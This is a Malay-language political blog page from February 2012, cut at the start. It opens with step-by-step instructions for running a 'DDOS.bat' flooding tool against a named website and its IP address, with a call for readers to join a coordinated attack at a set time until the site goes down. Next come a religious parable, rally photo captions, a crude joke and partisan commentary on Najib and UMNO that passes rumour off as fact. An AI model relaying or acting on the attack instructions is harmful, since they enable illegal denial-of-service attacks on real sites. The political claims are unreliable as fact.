5) tukarkan nama file dan extension file tersebut kepada "DDOS.bat"


6) Siap cara pembuatan


Atau download saja di sini click

.::Cara Guna::.


1) Buka File "DDOS.bat" itu tadi.

2) Pada menu Server Target tersebut, Masukkan Url website iaitu :

burn-the-koran.com



3) Tekan "Enter"



4) Selepas anda tekan enter, applikasi ini akan memaparkan :

ip Host


5) Langkah seterusnya, Bila applikasi ini minta anda masukkan "ip host" anda perlulah memasukkan Nombor IP yang telah tercatit semasa ujian Ping diatas dilakukan iaitu


64.182.89.11


6) Tekan "Enter"


7) Seterusnya anda di minta untuk memasukkan di bahagian "Packet Size". Masukkan jumah "100000"


8) Kemudian tekan butang "Enter"


9) DONE ! Tahniah !Serangan DDOS telah berjaya anda jalankan !


10) Serangan DDOS ini akan berlaku selagi anda belum tutup Applikasi ini.


11) Biarkan Applikasi ini berjalan dan anda boleh buat perkara lain...tido ke no hal.


12)Serangan akan diseragamkan pada malam ini 26/2/2012 tepat pukul 10 malam sehingga website tu down !

11) Semoga berjaya ! TAKBIR !! ALLAHUAKBAR!!


Sebuah kisah di zaman Nabi Ibrahim, semasa Nabi Ibrahim dibakar oleh kaumnya, seekor burung kecil terbang berulang alik mengisi air dalam paruhnya lalu menyiram ke atas api yang membakar. Itulah yang dilakukannya berulangkali. Tingkah lakunya diperhatikan oleh makhluk Allah yang lain lalu bertanya kepada burung kecil itu, ‘buat apa kau penat-penat mengambil air berulang alik, sedangkan api yang membakar Nabi Ibrahim takkan terpadam dengan air yang kau siramkan itu.’Lalu dijawab oleh burung tersebut, ‘Memang ia tidak akan memadamkan api tersebut, tetapi aku lebih takut kepada Allah kerana Allah akan menyoal aku nanti, apakah yang aku lakukan untuk agama Allah, dan Allah tidak akan bertanya samada aku berjaya memadamkan api itu ataupun tidak‘.

Dan janganlah kita menjadi seperti cicak (yang terbang), yang bertindak jahat dengan menghembus-hembus kepada api yang membakar Nabi Ibrahim dengan harapan api akan menjadi marak lagi untuk terus membakar Nabi Ibrahim (walaupun sebenarnya hembusannya itu tidak membawa kesan ke atas api berkenaan.)

Anbiyaa [69] Kami berfirman: Hai api, jadilah engkau sejuk serta selamat sejahtera kepada Ibrahim!.

Hadith riwayat Ibn Hatim, dari A’isyah ra. bahawa Rasulullah saw bersabda :”Sesungguhnya Ibrahim tatkala dicampakkan kedalam api, semua binatang yang melata dimuka bumi ini cuba memadamkan api, kecuali cicak, kerana sesungguhnya dia (cicak) meniupkan api keatas Nabi Ibrahim…”

## ADAKAH ANDA BERSIFAT CICAK ATAU BURUNG? ##


KONGSI ARTIKEL INI MELALUI FACEBOOK

GAMBAR HIMPUNAN HIJAU 2.0


ALAMAKKK!!!! INI DAH TUMPANG DEMO HIJAU...TAKPA JANJI TURUN BEB KAH! KAH! KAH!
Walaupun hati dia sedih dek kerana cinta yg putus namun dia tetap bersemangat..kahkahkah..




DEY MACHA!!!
GUA TUJUKAN LAGU INI KHAS UNTUK PESERTA DEMO
HIMPUNAN HIJAU 2.0 DI SELURUH MALAYSIA
KHASNYA DI KUANTAN...
APA KEJADAHNYA NAK JADI TONG SAMPAH AUSTRALIA
KAH! KAH! KAH!


Peserta-peserta perhimpunan sedang menyanyikan lagu "Suara Rakyat".







Antara gelagat peserta perhimpunan.


Pak Samad Said sedang baca puisi.


Hishamudin Rais,aktivis PSM sedang berucap.


Perarakan oleh peserta perhimpunan dengan laungan "Save Malaysia"


Penyokong MCA Turut Turun Menyatakan Sokongan Membantah Lynas... Orang UMNO Jer Yang Sokong Lynas...


Ribuan hadiri himpunan anti lynas. Tahniah rakyat Kuantan.


DSAI sedang berucap dan dalam ucapannya beliau berkata,bila Pakatan Rakyat jadi kerajaan selepas PRU 13,Pakatan Rakyat akan batalkan projek Lynas."Saya sudahkan mesej bantahan rakyat Malaysia kepada kerajaan Australia",katanya.



Perhimpunan Hijau 2.0 Anti Lynas juga turut diadakan di Kuala Lumpur



KREDIT GAMBAR:

PDRM
Buletin Pakatan Rakyat
Kami Boikot Buletin Utama TV3


KONGSI ARTIKEL INI MELALUI FACEBOOK

LAWAK AHAD: POTENSI DAN REALITI



Anak bongsu: Ayah, apa perbezaan antara 'Berpotensi' & 'Realiti'?

Ayah berpaling kepada isterinya: Adakah kamu sudi tidur dengan Bill Gates untuk 1 juta ?

Isteri: Sudah tentu! Saya tidak akan membazirkan peluang seperti itu!

Kemudian Ayah bertanya anak perempuannya, kamu mau tidur dengan Brad Pitt kerana 1 Juta ?

Anak perempuan: Ya sudah tentu! Dia fantasi saya!!

Ayah bertanya pula kepada anak lelaki sulungnya: Macamana dengan kamu pula,adakah mau tidur dengan Tom Cruise untuk 1 juta ??

Anak sulung: Mengapa tidak? Bayangkan semua apa yang saya boleh lakukan dengan wang sebanyak itu!

Bapa berpaling kepada anak bongsunya dan berkata: Kamu dah faham? Kita 'Berpotensi' mendapat 3 juta $, tetapi dalam 'Realiti' kita hidup dengan 2 pelacur dan 1 gay.




KONGSI ARTIKEL INI MELALUI FACEBOOK

Sabtu, Februari 25, 2012

UTUSEKS MELOYA AKUI SECARA TERBUKA KEHEBATAN DAN KEMAMPUAN DATUK SERI ANWAR IBRAHIM ..TAK MACAM NAJIB!!!!





UTUSEKS MELOYA SECARA TERBUKA KAGUM DAN KAGET AKAN KEHEBATAN DATUK SERI ANWAR IBRAHIM MENGAWAL PERJALANAN GAGASAN PAKATAN RAKYAT...SAMPAIKAN SEGALA KEPUTUSAN PARTI DALAM PAKATAN RAKYAT PERLU MENDAPAT RESTU DAN CAMPUR TANGAN BELIAU...PERGH!! INI BARU DIKATAKAN PEMIMPIN YANG HEBAT....MEMPUNYAI TENAGA DAN KEBERANIAN UNTUK MENGAWAL PARTI-PARTI LAIN DALAM SATU GAGASAN...

NAJIB RAZAK MEMANG HAMPEH!!.. PRESIDEN MCA KETUK DAN HINA ISLAM DIA SENYAP MEMBISU TERKEDU TAKUT MENIKUS....PRESIDEN PBB TAIB MAHMUD ENGGAN LEPASKAN JAWATAN SEBAGAI KETUA MENTERI SARAWAK DIA TAK KATA APA PUN....GERAKAN KALAH SAMPAI LANGSUNG SATU KERUSI PUN TAK DA DAN SERAH PEMERINTAHAN NEGERI KEPADA DAP/PR DIA MASIH LANTIK PRESIDENNYA SEBAGAI PENGERUSI BARISAN NASIONAL NEGERI PULAU PINANG SEDANGKAN UMNO ADA 11 KERUSI DUN....LAGI TERUKNYA PRESIDENNYA DILANTIK JADI MENTERI PENUH..BUKAN SEBARANG MENTERI.. TETAPI MENTERI JAGA KPI NEGARA...

KETUA WANITA UMNO MALAYSIA TERPALIT DALAM SKANDAL LEMBU NFC..MANA ADA DIA AMBIL TINDAKAN....LEBIH-LEBIH DIA CAKAP BERDEGAR ITU ADALAH BUDI BICARA DAN HAK MUTLAK BELIAU SEBAGAI PERDANA MENTERI.. TIDAK SESIAPA BOLEH MEMPERTIKAI DAN MEMPERSOALKANNYA...

TERIMA KASIH UTUSEKS MELOYA KERANA MENGIKTIRAF KEHEBATAN BAKAL PERDANA MENTERI MALAYSIA KE
-7 YB DATUK SERI ANWAR IBRAHIM...JUTAAN TERIMA KASIH..

omakkau


KONGSI ARTIKEL INI MELALUI FACEBOOK

PANAS!! Sebab apa Najib lewatkan pilihanraya ??







Perdana Menteri Datuk Seri Najib Tun Razak telah melambatkan keputusan
tegas mengenai hampir setiap isu. Ia atau tidak kelewatan itu
disengajakan, kerana beliau telah dituduh sebagai memanipulasi, beliau
telah memilih untuk membiarkan kejatuhan kewangan NFC sebanyak RM250
juta yang melibatkan menteri Shahrizat Jalil lepas walaupun ia boleh
mencetuskan tindak balas sentimen awam bagi pihak Umno.



Beliau juga telah memotong hanyut MCA, Gerakan dan MIC, menyebabkan
pihak-pihak ini untuk terus lemah di mata masyarakat mereka. Malah bekas
Perdana Menteri Mahathir Mohamad cuba lebih

keras,
menghantar timbalannya Ghafar Baba untuk menyelesaikan masalah pada
komponen dan membantu membaiki keadaan biasa Barisan Nasional. Tetapi
mungkin, BN tidak boleh diselamatkan lagi.


Hanya sekali sejak mewarisi jawatan Perdana Menteri dari Abdullah Badawi
pada April 2009 telah Najib cuba untuk mengemudi hala tuju BN. Ia
adalah semasa pilihan raya negeri Sarawak pada bulan April 2011, dan
Najib gagal - teruk. Beliau telah menetapkan bagi 'menjinakkan' Ketua
Menteri Sarawak Taib Mahmud tetapi berakhir dimalukan oleh seorang
lelaki lebih tua yang licik itu.




Taib berjaya membuatkan Najib kelihatan bodoh tanpa meninggikan
suaranya. Apa yang beliau harus lakukan adalah mengabaikan panggilan
terdesak dan agak biadap Najib untuk beliau meletak jawatan. Ia adalah
selepas pilihan raya Sarawak adalah bahawa rakyat Malaysia, khususnya
dari Semenanjung, sedar bahawa Najib tidak berkuasa sebagaimana yang
digambarkan oleh parti Umno.




Begitu 'lembut' Najib kerana beliau tidak boleh mengawal Rosmah Mansor
isteri beliau atau menghalangnya daripada merebut gelaran Wanita Pertama
Malaysia, yang sebenarnya untuk Permaisuri. Tidak perlu dikatakan,
beliau juga tidak berjaya menghalangnya dari membeli-belah barangan yang
teramat mahal.



Tiba-tiba sahaja bertindak menyerang









Tiba-tiba, mulai 15 Februari, Najib mula bergerak dengan tenaga yang
lebih jelas. Beliau mula untuk melontarkan peluru berpandu lisan kepada
saingan ketatnya Anwar Ibrahim, memanggilnya “bermuka-muka” dalam satu temu bual dengan WSJ mengenai isu Israel-Palestin, yang juga ditimbulkan oleh akhbar Utusan Umno.


Senior Umnonya Mahathir Mohamad melepaskan serangan seterusnya,
memanggil Anwar pengintip bagi membantu AS dan Israel menubuhkan sebuah
kerajaan boneka di Malaysia untuk menumbangkan BN. Ini adalah topik yang
amat panas untuk Umno, terutama di zaman dahulu apabila ia mahu untuk
memangkin umat Islam ke dalam blok pengundi BN.




Malah Anwar percaya Pu-13 adalah begitu hampir, dan telah mengunjurkan
hari pengundian pada Mei-Jun 2012. Tetapi ini mungkin terlalu awal.
November 2012 adalah lebih mungkin lagi, memandangkan skim wang
penjanaan Najib fikirkan untuk Umno, BN dan sudah tentu, dirinya
sendiri.



Membersihkan imejnya dan merosakkan imej Anwar pada masa yang sama









Dalam salah satu langkah-langkah tangkas beliau, Najib telah berjaya
meyakinkan Mufti Perak Harussani Zakaria bahawa beliau dan Rosmah
bukannya umat Islam yang teruk bagi menghadiri Thaipusam di Batu Caves,
Selangor.


Harussani telah mengejutkan negara apabila beliau mencaci pasangan
kerana ‘tidak Islamik’ dan menghadiri acara “berhala”. Dalam masa 2
hari, TV1 kebangsaan menunjukkan perjumpaan Najib dengan Mufti dan
menjelaskan perjalanan beliau ke Batu Caves.




Sudah tentu, Harussani mengakui kesilapan beliau dan mengisytiharkan status Islam yang bersih untuk kedua-dua PM dan

isteri.

UMNO menyerang PR dan bersedia untuk memenangi Selangor









Pada malam yang sama, TV3 telah mengadakan satu rancangan bual bicara
dengan Satim Diman dari Umno, Ketua Pembangkang Selangor dan Sohaimi
Shahadan, ahli Exco Pemuda Umno. Kedua-dua lelaki bergegas untuk
menyerlahkan semua perkara yang Pakatan Rakyat gagal sampaikan dalam
manifesto pilihan raya.


Minggu sebelum itu, Najib mengesahkan pelantikan Datuk Seri Ong Tee Keat
sebagai Ketua BN Selangor. Malam tadi di tengah-tengah kritikan bahawa
perancangan beliau yang hebat untuk mengambil semula Selangor hancur
kerana beliau tidak dapat menamakan seorang MB sebagai ketua menteri
yang dilantik, beliau melantik Mohd Zin, Ahli Parlimen Umno Sepang untuk
menjadi penyelaras kempen pilihan raya BN bagi Selangor.




Spekulasi telah berpusar bahawa Tee Keat mungkin dijadikan Menteri Besar
Selangor jika dia memberi kerusi Parlimen Pandan bagi Dewan Undangan
Negeri (DUN). Jika benar, ini sememangnya akan menjadi satu langkah
kontroversi kerana ia akan menjadi kali pertama Selangor mempunyai MB
bukan-Melayu. Walau bagaimanapun, semua ini akan bergantung kepada
rahmat Sultan.




Umno telah memulakan usaha untuk memenangi semula Kedah




Tangan Umno telah bergolak dalam kerajaan negeri Kedah di bawah pimpinan
Pakatan Rakyat, dengan persatuan berkaitan MCA mengetuai membuat aduan
bahawa pembantu kepada Dewan Undangan Negeri Pakatan Rakyat telah
menuntut ‘rebat’ antara 25 hingga 30% daripada dana yang perlu dibayar
kepada mereka.




Ini diikuti oleh BN mengisytiharkan Kedah sebagai negeri yang boleh dimenangi.



Dakwat kekal









Suruhanjaya Pilihan Raya telah mengumumkan bahawa dakwat kekal akan
digunakan dalam PU-13, dan stok yang ditempah mesti digunakan dalam
tempoh tiga bulan jangka hayatnya.


Jadi, ketika Kastam mengumumkan ketibaan kumpulan pertama dakwat
tersebut, rakyat Malaysia akan tahu bahawa PU-13 akan diadakan dalam
tempoh tiga bulan dari tarikh

tersebut!

Menguatkan BN









Najib juga telah mengumumkan tiga gabungan ahli-ahli baru untuk BN,
iaitu Gabungan Wawasan Generasi Felda, Persatuan bekas Anggota Kemas
Malaysia dan Persatuan Kontraktor Melayu Malaysia.


Ketiga-tiga badan ini mempunyai ahli di seluruh Semenanjung Malaysia,
yang akan digerakkan untuk membantu BN memenangi PU-13,memberi tumpuan
kepada kawasan luar bandar dan perkhidmatan di sana.



Mahathir menyokong kempen BN









Mahathir telah meningkatkan ante itu, dan cuba untuk menakutkan orang
Melayu khususnya, dengan menuduh Ketua Pembangkang Datuk Seri Anwar
Ibrahim bekerjasama dengan AS dan Israel untuk menggulingkan BN dan
menubuhkan sebuah kerajaan boneka di sini.


Mesej yang tersirat sudah tentunya adalah bahawa nasib orang Melayu akan
menjadi sangat tidak tentu di bawah Pakatan Rakyat. Mahathir pada masa
yang sama cuba untuk menanam rasa takut dalam fikiran orang bukan Melayu
bahawa perubahan rejim akan ditentang oleh orang Melayu. Keganasan
boleh berlaku, dan menghancurkan Malaysia.



Najib tidak mengambil sebarang tindakan terhadap Taib









Selepas pengajarannya pada April 16, 2011, Najib telah berhenti mencuba untuk menolak Taib.


PM akan terus menutup mata kepada Taib yang merampas kekayaan rakyat

Sarawak, selagi sebagai MB tersebut memberikan kerusi Parlimen kepada BN dalam PU-13.

Kesan pemberian Belanjawan dan pertumbuhan ekonomi









Najib juga yakin bahawa faktor rasa-baik dari pelbagai Bajet 2012
pemberian wang tunai kepada pelajar dan keluarga berpendapatan rendah
akan memihak kepada BN.


Beliau berharap pengumuman oleh Bank Negara bahawa pertumbuhan
ekonomi Malaysia adalah 5.2 peratus, melebihi 4.2 peratus ramalan
sebelumnya, akan meningkatkan keyakinan dalam pengurusan ekonomi.




Tetapi, penganalisis mengadu hasilnya adalah ‘dinaikkan’ dan bukan
mencerminkan trend yang sihat langsung kerana ia bergantung kepada
perbelanjaan pengguna - di kedua-dua tahap kerajaan dan swasta untuk
menaikkan pertumbuhan tajuk utama. Ketiadaan pertumbuhan adalah sangat
ketara dalam pelaburan awam dan

swasta.

Adakah UMNO dan Najib benar-benar bersedia?









Jawapannya adalah TIDAK. Najib masih tidak berpuas hati dengan keadaan
sekarang walaupun Rosmah telah dianugerahkan Ijazah Doktor Kehormat oleh
Universiti Curtin untuk membantu menebus beberapa kredibiliti.


Terdapat juga kata-kata bahawa Najib bekerja keras dalam tinjauan
populariti yang akan menunjukkan dirinya jauh lebih hebat dari Anwar
dalam pandangan rakyat. ‘Kajian’ ini akan ditangguhkan sehingga beliau
cukup yakin untuk membubarkan Parlimen.




Najib tidak hanya mahu mewujudkan faktor rasa-baik. Beliau mahu orang
ramai untuk kembali keyakinan dalam BN dan membantu beliau mencapai
margin dua pertiga di Parlimen. Tetapi Rosmah juga akan memberitahu
beliau bahawa itu tidak mungkin!



Najib needs more time and money









Kemudian, Najib juga memerlukan lebih banyak wang. Ia adalah penting
jika senarai Felda Global Ventures akan berada di pasaran pada bulan
Mei-Jun. IPO boleh dijangka untuk melompat pada hari penyenaraian dan
peneroka Felda yang terlalu gembira boleh dijangka untuk mengundi Umno
sekali lagi apabila dipanggil untuk peti undi tidak lama selepas itu.


Khabar angin di Kementerian Kewangan sarat dengan desas desus bahawa
Umno akan menyedut setiap sen pembiayaan ganti daripada semua badan
kerajaan lain atas alasan mahu melaksanakan projek-projek di seluruh
negara. Sebenarnya, wang itu akan digunakan untuk berfoya-foya membeli
undi gergasi, seperti perjalanan membeli-belah keterlaluan Rosmah.




Kontroversi 1Care akan berjalan, meningkatkan kira-kira RM11bilion bagi
Umno-BN untuk disedut keluar sebaik sahaja ia dilancarkan, mungkin
menjelang Januari tahun depan. Umno sudah tentu akan terus menghisap
Wang Simpanan Pekerja.




Penyenaraian Felda, dijangka mencapai RM21bil apabila ia keluar, akan
dikawal oleh koperasi Permodalan Felda (KPF), yang akan menjadi pemegang
saham tunggal terbesar entiti Felda Global Ventures yang tersenarai
dengan 37 peratus pegangan. Tidak hairanlah, Najib mendesak menjadikan
Isa Samad pengerusi KPF. Ini akan membolehkan UMNO dan proksinya di
Felda mengambil wang dan menarik sejumlah besar yang diperoleh daripada
jualan

saham.


Dana PERKESO atau Socso juga akan dialihkan serta Tabung Haji, koperasi
yang disokong UMNO, badan-badan berkanun yang lain dan semua Syarikat
Berkaitan Kerajaan. Tidak perlu dikatakan, mereka semua akan dipanggil
untuk menyumbang sebahagian besar sumber-sumber mereka bagi membantu
UMNO supaya terus berkuasa.



Emas di hujung pelangi









Soalan bernilai yang patut ditanyakan adalah, adakah Umno-BN benar-benar
memerlukan begitu banyak wang untuk memegang PU-13? Jelas sekali,
jawapannya TIDAK. Najib dan kroni beliau juga melompat bagi mendapat
pegangan TERAKHIR mereka, dan rakyat Malaysia boleh yakin bahawa jumlah
yang diraih mereka akan menjadi berlipat ganda yang sebenarnya
dibelanjakan untuk pembiayaan PU-13, termasuk ‘peruntukan’ yang
diketepikan untuk membeli undi.


Panggilnya penipu atau rasuah yang diinstitusikan, tetapi ia tidak akan
menghalang Najib. Untuk rancangannya berjaya, Najib akan memerlukan masa
dan dia sanggup menunggu sehingga hampir akhir tempoh perkhidmatan pada
tahun 2013. Pepatah emas di hujung pelangi adalah terlalu banyak untuk
diabaikan. Malah Mahathir tidak boleh menakutkan beliau dalam memegang
PU-13 sebelum ini.




Diberikan status semasa 1Care dan penyenaraian Felda, yang keduanya
masih menghadapi tentangan awam, PU-13 kelihatan lebih mungkin akan
diadakan pada bulan November 2012 dan bukannya pada bulan Mei-Jun. Malah
mungkin pada tahun 2013.



Malaysia Chronicle


atsixty-zakriali

KONGSI ARTIKEL INI MELALUI FACEBOOK

LISTEN TO AL-QURAN ONLINE

Listen to Quran

Blog Archive